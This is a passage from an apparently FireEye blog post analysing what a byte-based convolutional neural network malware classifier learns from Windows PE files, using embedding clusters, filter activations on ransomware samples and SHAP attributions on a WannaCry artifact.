On the left side of Figure 2, we show the two-dimensional representation of our byte embedding space with each of the clusters labeled, along with an outlier cluster labeled as -1. As you can see, the vast majority of bytes fall into one large catch-all class (Cluster 3), while the remaining three clusters have just two bytes each. Though there are no obvious semantic relationships in these clusters, the bytes that were included are interesting in their own right – for instance, Cluster 0 includes our special padding byte that is only used when files are smaller than the fixed-length cutoff, and Cluster 1 includes the ASCII character ‘r.’

What is more fascinating, however, is the set of outliers that the clustering produced, which are shown in the right side of Figure 3.  Here, there are a number of intriguing trends that start to appear. For one, each of the bytes in the range 0x0 to 0x6 are present, and these bytes are often used in short forward jumps or when registers are used as instruction arguments (e.g., eax, ebx, etc.). Interestingly, 0x7 and 0x8 are grouped together in Cluster 2, which may indicate that they are used interchangeably in our training data even though 0x7 could also be interpreted as a register argument. Another clear trend is the presence of several ASCII characters in the set of outliers, including ‘\n’, ‘A’, ‘e’, ‘s’, and ‘t.’ Finally, we see several opcodes present, including the call instruction (0xe8), loop and loopne (0xe0, 0xe2), and a breakpoint instruction (0xcc).

Given these findings, we immediately get a sense of what the classifier might be looking for in low-level features: ASCII text and usage of specific types of instructions.

Deciphering Low-Level Features

The next step in our analysis is to examine the low-level features learned by the first layer of convolutional filters. In our architecture, we used 96 convolutional filters at this layer, each of which learns basic building-block features that will be combined across the succeeding layers to derive useful high-level features. When one of these filters sees a byte pattern that it has learned in the current convolution, it will produce a large activation value and we can use that value as a method for identifying the most interesting bytes for each filter. Of course, since we are examining the raw byte sequences, this will merely tell us which file offsets to look at, and we still need to bridge the gap between the raw byte interpretation of the data and something that a human can understand. To do so, we parse the file using PEFile and apply BinaryNinja’s disassembler to executable sections to make it easier to identify common patterns among the learned features for each filter.

Since there are a large number of filters to examine, we can narrow our search by getting a broad sense of which filters have the strongest activations across our sample of 4,000 Windows PE files and where in those files those activations occur. In Figure 3, we show the locations of the 100 strongest activations across our 4,000-sample dataset. This shows a couple of interesting trends, some of which could be expected and others that are perhaps more surprising. For one, the majority of the activations at this level in our architecture occur in the ‘.text’ section, which typically contains executable code. When we compare the ‘.text’ section activations between malware and goodware subsets, there are significantly more activations for the malware set, meaning that even at this low level there appear to be certain filters that have keyed in on specific byte sequences primarily found in malware. Additionally, we see that the ‘UNKNOWN’ section– basically, any activation that occurs outside the valid bounds of the PE file – has many more activations in the malware group than in goodware. This makes some intuitive sense since many obfuscation and evasion techniques rely on placing data in non-standard locations (e.g., embedding PE files within one another).

Figure 3: Distribution of low-level activation locations across PE file headers and sections. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right). UNKNOWN indicates an area outside the valid bounds of the file and NULL indicates an empty section name.

We can also examine the activation trends among the convolutional filters by plotting the top-100 activations for each filter across our 4,000 PE files, as shown in Figure 4. Here, we validate our intuition that some of these filters are overwhelmingly associated with features found in our malware samples. In this case, the activations for Filter 57 occur almost exclusively in the malware set, so that will be an important filter to look at later in our analysis. The other main takeaway from the distribution of filter activations is that the distribution is quite skewed, with only two filters handling the majority of activations at this level in our architecture. In fact, some filters are not activated at all on the set of 4,000 files we are analyzing.

Figure 4: Distribution of activations over each of the 96 low-level convolutional filters. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right).

Now that we have identified the most interesting and active filters, we can disassemble the areas surrounding their activation locations and see if we can tease out some trends. In particular, we are going to look at Filters 83 and 57, both of which were important filters in our model based on activation value. The disassembly results for these filters across several of our ransomware artifacts is shown in Figure 5.

For Filter 83, the trend in activations becomes pretty clear when we look at the ASCII encoding of the bytes, which shows that the filter has learned to detect certain types of imports. If we look closer at the activations (denoted with a ‘*’), these always seem to include characters like ‘r’, ‘s’, ‘t’, and ‘e’, all of which were identified as outliers or found in their own unique clusters during our embedding analysis.  When we look at the disassembly of Filter 57’s activations, we see another clear pattern, where the filter activates on sequences containing multiple push instructions and a call instruction – essentially, identifying function calls with multiple parameters.

In some ways, we can look at Filters 83 and 57 as detecting two sides of the same overarching behavior, with Filter 83 detecting the imports and 57 detecting the potential use of those imports (i.e., by fingerprinting the number of parameters and usage). Due to the independent nature of convolutional filters, the relationships between the imports and their usage (e.g., which imports were used where) is lost, and that the classifier treats these as two completely independent features.

Figure 5: Example disassembly of activations for filters 83 (Left) and 57 (Right) from ransomware samples. Lines prepended with '*' contain the actual filter activations, others are provided for context.

Aside from the import-related features described above, our analysis also identified some filters that keyed in on particular byte sequences found in functions containing exploit code, such as DoublePulsar or EternalBlue. For instance, Filter 94 activated on portions of the EternalRomance exploit code from the BadRabbit artifact we analyzed. Note that these low-level filters did not necessarily detect the specific exploit activity, but instead activate on byte sequences within the surrounding code in the same function.

These results indicate that the classifier has learned some very specific byte sequences related to ASCII text and instruction usage that relate to imports, function calls, and artifacts found within exploit code. This finding is surprising because in other machine learning domains, such as images, low-level filters often learn generic, reusable features across all classes.

Bird’s Eye View of End-to-End Features

While it seems that lower layers of our CNN classifier have learned particular byte sequences, the larger question is: does the depth and complexity of our classifier (i.e., the number of layers) help us extract more meaningful features as we move up the hierarchy? To answer this question, we have to examine the end-to-end relationships between the classifier’s decision and each of the input bytes. This allows us to directly evaluate each byte (or segment thereof) in the input sequence and see whether it pushed the classifier toward a decision of malware or goodware, and by how much. To accomplish this type of end-to-end analysis, we leverage the SHapley Additive exPlanations (SHAP) framework developed by Lundberg and Lee. In particular, we use the GradientSHAP method that combines a number of techniques to precisely identify the contributions of each input byte, with positive SHAP values indicating areas that can be considered to be malicious features and negative values for benign features.

After applying the GradientSHAP method to our ransomware dataset, we noticed that many of the most important end-to-end features were not directly related to the types of specific byte sequences that we discovered at lower layers of the classifier. Instead, many of the end-to-end features that we discovered mapped closely to features developed from manual feature engineering in our traditional ML models. As an example, the end-to-end analysis on our ransomware samples identified several malicious features in the checksum portion of the PE header, which is commonly used as a feature in traditional ML models. Other notable end-to-end features included the presence or absence of certain directory information related to certificates used to sign the PE files, anomalies in the section table that define the properties of the various sections of the PE file, and specific imports that are often used by malware (e.g., GetProcAddress and VirtualAlloc).

In Figure 6, we show the distribution of SHAP values across the file offsets for the worm artifact of the WannaCry ransomware family. Many of the most important malicious features found in this sample are focused in the PE header structures, including previously mentioned checksum and directory-related features. One particularly interesting observation from this sample, though, is that it contains another PE file embedded within it, and the CNN discovered two end-to-end features related to this. First, it identified an area of the section table that indicated the ‘.data’ section had a virtual size that was more than 10x larger than the stated physical size of the section. Second, it discovered maliciously-oriented imports and exports within the embedded PE file itself. Taken as a whole, these results show that the depth of our classifier appears to have helped it learn more abstract features and generalize beyond the specific byte sequences we observed in the activations at lower layers.

Figure 6: SHAP values for file offsets from the worm artifact of WannaCry. File offsets with positive values are associated with malicious end-to-end features, while offsets with negative values are associated with benign features.


In this blog post, we dove into the inner workings of FireEye’s byte-based deep learning classifier in order to understand what it, and other deep learning classifiers like it, are learning about malware from its unstructured raw bytes. Through our analysis, we have gained insight into a number of important aspects of the classifier’s operation, weaknesses, and strengths:

  • Import Features: Import-related features play a large role in classifying malware across all levels of the CNN architecture. We found evidence of ASCII-based import features in the embedding layer, low-level convolutional features, and end-to-end features.
  • Low-Level Instruction Features: Several features discovered at the lower layers of our CNN classifier focused on sequences of instructions that capture specific behaviors, such as particular types of function calls or code surrounding certain types of exploits. In many cases, these features were primarily associated with malware, which runs counter to the typical use of CNNs in other domains, such as image classification, where low-level features capture generic aspects of the data (e.g., lines and simple shapes). Additionally, many of these low-level features did not appear in the most malicious end-to-end features.
  • End-to-End Features: Perhaps the most interesting result of our analysis is that many of the most important maliciously-oriented end-to-end features closely map to common manually-derived features from traditional ML classifiers. Features like the presence or absence of certificates, obviously mangled checksums, and inconsistencies in the section table do not have clear analogs to the lower-level features we uncovered. Instead, it appears that the depth and complexity of our CNN classifier plays a key role in generalizing from specific byte sequences to meaningful and intuitive features.

It is clear that deep learning offers a promising path toward sustainable, cutting-edge malware classification. At the same time, significant improvements will be necessary to create a viable real-world solution that addresses the shortcomings discussed in this article. The most important next step will be improving the architecture to include more information about the structural, semantic, and syntactic context of the executable rather than treating it as an unstructured byte sequence. By adding this specialized domain knowledge directly into the deep learning architecture, we allow the classifier to focus on learning relevant features for each context, inferring relationships that would not be possible otherwise, and creating even more robust end-to-end features with better generalization properties.

The content of this blog post is based on research presented at the Conference on Applied Machine Learning for Information Security (CAMLIS) in Washington, DC on Oct. 12-13, 2018. Additional material, including slides and a video of the presentation, can be found on the conference website.